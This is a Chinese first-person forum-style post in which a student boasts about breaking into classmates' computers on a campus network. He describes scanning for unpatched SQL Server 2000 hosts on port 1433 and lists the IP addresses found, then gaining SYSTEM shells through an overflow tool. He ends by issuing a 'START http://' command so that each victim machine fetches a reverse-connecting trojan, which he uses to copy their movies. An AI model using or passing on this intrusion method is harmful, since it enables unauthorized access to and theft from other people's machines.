最近，毕业设计也做完了，闲的无聊！每天都是跟同学在一起斗地主，但是斗久了就无聊啊。看片吧，租了几个后，感觉不和算，每次看一个片都得花好几块钱，从别人的电脑里面拷吧！但是现在啊，大家的安全意识都高了，都装了防火墙，（比如：天网，瑞星），更可恨的是现在最新的瑞星病毒防火墙，对每次的溢出攻击都提示，类似“来自：XX。XX。XX。XX的MS04011的攻击”的语句，不仅进不去别人的机器，还被人骂啊，555555555。学校还分了多个VPN，还把135.136.137138。139，445端口都屏蔽了，防止大家互相共享东西，郁闷！
    怎么办呢 ？好象大家毕业设计都用SQL2K做的服务器，一般学校的这个网速，补丁是肯定下不了的，大家都没有打，我记得我进学校的一个服务器都是这么进去的，我想大家应该也不会打啊！
拿起superscan4.0扫了下1433的，呵呵强哈，一会就出来N多个保存下来随便看下哈：
* + 202.207.86.186
|___1433Microsoft-SQL-Server
* + 202.207.87.182
|___1433Microsoft-SQL-Server
* + 202.207.91.117
|___1433Microsoft-SQL-Server
* + 202.207.92.117
|___1433Microsoft-SQL-Server
* + 202.207.93.153
|___1433Microsoft-SQL-Server
* + 202.207.93.236
|___1433Microsoft-SQL-Server
* + 202.207.93.242
|___1433Microsoft-SQL-Server
呵呵，虽然不是很多，不过有几个就可以了，我不求别的只求能有几个片就可以了！
　　拿起SQL工具，溢出，得到CMD的SYSTEM权限，但是我要这个权限没有用啊。我又进不去拷贝不了电影啊！在CMD下面看到不少好片名，郁闷！我想起用TFTP传送一个木马过去，但是不成功！·估计是防火墙不允许！
　　我在自己的机器开了ＩＩＳ服务，把ＦＴＰ也开了，登陆不了ＦＴＰ。看来这个方法是不行了啊！
　　　那就怎么办呢？看到片名，看不到内容，郁闷得很啊！
　　　突然看到网上有一个遥控下载者，这个代码我到是看过，我突然灵机一动，哈哈，我自己做一个内部的网页，里面加个反弹木马不就可以了！只要他访问，就ＯＫ拉！
　　　关键的问题是怎么让他访问这个网页啊！这点最郁闷啊！，我在ＣＭＤ下虽然拥有ＳＹＳＴＥＭ权限但是，我却不可以上网啊！郁闷啊！
　　突然想了下，我自己到ＳＹＳＴＥＭ，ＳＹＳＴＥＭ３２，ＷＩＮＮＴ目录下去看看，究竟有多少ＤＯＳ命令可以用啊。！最后我发现了这个命令：ＳＴＡＲＴ命令，估计大家都用的少！我把他的ＨＬＰ贴出来给大家看看！：
启动另一个窗口运行指定的程序或命令。
START ["title"] [/Dpath] [/I] [/MIN] [/MAX] [/SEPARATE | /SHARED]
 [/LOW | /NORMAL | /HIGH | /REALTIME | /ABOVENORMAL | /BELOWNORMAL]
 [/WAIT] [/B] [command/program]
 [parameters]
 "title" 在窗口标题栏中显示的标题。
 path起始目录
 B 在不创建新窗口的情况下开始应用程序。 除非
 启动 ^C 处理，否则该应用程序会忽略 ^C 处理；
^Break 是唯一可以中断该应用程序的方式
 I 新环境是传递给 cmd.exe 的原始环境，
 而不是当前环境
 MIN 开始时窗口最小化
 MAX 开始时窗口最大化
 SEPARATE在分开的空间内开始 16 位 Windows 程序
 SHARED在分共享的空间内开始 16 位 Windows 程序
 LOW 在 IDLE 优先级类别开始应用程序
 NORMAL在 NORMAL 优先级类别开始应用程序
 HIGH在 HIGH 优先级类别开始应用程序
 REALTIME在 REALTIME 优先级类别开始应用程序
 ABOVENORMAL 在 ABOVENORMAL 优先级类别开始应用程序
 BELOWNORMAL 在 BELOWNORMAL 优先级类别开始应用程序
 WAIT启动应用程序并等候它结束
 command/program
 如果是内部 cmd 命令或批文件，那么该命令处理器是
 用 /K 命令选项运行 cmd.exe 的。这表示该窗口在命令运行
 后仍然存在。
 如果不是内部 cmd 命令或批文件，则是一个程序，并
 作为窗口应用程序或控制台应用程序运行。
 parameters这些为传送到命令/程序的参数

    如果命令扩展名被启用，通过命令行或 START 命令的外部命令
调用会如下改变:
将文件名作为命令键入，非可执行文件可以通过文件关联调用。
 (例如， WORD.DOC 会调用跟 .DOC 文件扩展名关联的应用程序)。
 关于如何从命令脚本内部创建这些关联，请参阅 ASSOC 和
FTYPE 命令。
执行的应用程序是 32-位 GUI 应用程序时，CMD.EXE 不等应用
程序终止就返回命令提示。如果在命令脚本内执行，该新行为则不会发生。
如果执行的命令行的第一个符号是不带扩展名或路径修饰符的
 字符串 "CMD"，"CMD" 会被COMSPEC 变量的数值所替换。这
 防止从当前目录抓出 CMD.EXE。
如果执行的命令行的第一个符号没有扩展名，CMD.EXE 会使用
 PATHEXT 环境变量的数值来决定要以什么顺序寻找哪些扩展
 名。PATHEXT 变量的默认值是:
 .COM;.EXE;.BAT;.CMD
 请注意，该语法跟 PATH 变量的一样，分号隔开不同的元素。
查找可执行文件时，如果没有相配的扩展名，看一看该名称是否
与目录名相配。如果确实如此，START 会在那个路径上调用
Explorer。如果从命令行执行，则等同于对那个路径作 CD /D。

　　我直接在ＣＭＤ下面打"ＳＴＡＲＴ　ＨＴＴＰ：／／muma"我木马得地址就可以了！
　　拿起我自己熟悉的木马看着熟悉的木马界面，把一部部ＭＯＶＩＥ，ＣＯＰＹ过来，过瘾啊！省了不少钱啊！